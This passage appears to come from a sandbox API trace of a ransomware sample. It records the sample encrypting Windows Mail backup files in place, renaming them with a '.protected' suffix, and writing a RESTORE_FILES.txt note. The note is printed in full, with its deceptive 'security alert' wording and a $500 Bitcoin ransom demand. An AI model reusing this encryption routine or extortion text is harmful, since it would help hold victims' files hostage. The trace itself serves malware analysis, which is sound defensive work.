Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.304] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".rar") returned 0x0 [0085.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.304] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".zip") returned 0x0 [0085.304] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0085.306] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.306] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0085.306] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.306] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.306] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.307] CloseHandle (hObject=0x14c) returned 1 [0085.307] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected") returned 136 [0085.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.protected")) returned 1 [0085.308] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0085.308] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 77 [0085.308] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0085.308] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0085.308] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned 79 [0085.308] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) 
returned 0x47ba90 [0085.308] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.308] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.308] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.308] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.308] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.308] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\.") returned 79 [0085.308] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.308] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.308] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.308] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.308] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.308] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.308] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.308] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\..") returned 80 [0085.309] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.309] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.309] lstrcmpiW (lpString1="old", lpString2="Windows") returned -1 [0085.309] lstrcmpiW (lpString1="old", lpString2="Program Files") returned -1 [0085.309] lstrcmpiW (lpString1="old", lpString2="Program Files (x86)") returned -1 [0085.309] lstrcmpiW (lpString1="old", lpString2="$Recycle.bin") returned 1 [0085.309] lstrcmpiW (lpString1="old", lpString2="System Volume 
Information") returned -1 [0085.309] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned 81 [0085.309] lstrcmpW (lpString1="old", lpString2=".") returned 1 [0085.309] lstrcmpW (lpString1="old", lpString2="..") returned 1 [0085.309] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*") returned 83 [0085.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.323] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.323] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.324] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.324] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.324] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.324] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\.") returned 83 [0085.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.324] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.324] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.324] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.324] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.324] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.324] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.324] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\..") returned 84 [0085.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.324] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0085.324] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.324] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0085.324] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0085.324] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.324] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.325] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.325] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0085.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.325] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0085.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.325] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0085.325] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.336] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.336] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.337] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.337] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.339] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.339] CloseHandle (hObject=0x154) returned 1 [0085.340] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.protected") returned 104 [0085.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log.protected")) returned 1 [0085.341] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0085.341] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.341] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0085.341] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0085.341] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.341] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.342] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0085.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.342] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0085.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.342] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0085.342] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.354] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.354] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.355] SetFilePointerEx (in: hFile=0x154, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.355] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.357] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.357] CloseHandle (hObject=0x154) returned 1 [0085.357] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.protected") returned 118 [0085.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.protected")) returned 1 [0085.358] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume 
Information") returned 1 [0085.358] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.358] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0085.358] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0085.358] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.358] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.359] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0085.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.359] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0085.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.359] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0085.359] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.368] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.368] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.369] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.369] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.369] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.369] CloseHandle (hObject=0x154) returned 1 [0085.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.protected") returned 107 [0085.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.protected")) returned 1 [0085.370] FindNextFileW (in: hFindFile=0x47bad0, 
lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.370] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.370] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\RESTORE_FILES.txt") returned 99 [0085.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.371] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.371] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.372] lstrlenA (lpString="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") returned 684 [0085.372] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.372] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.372] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
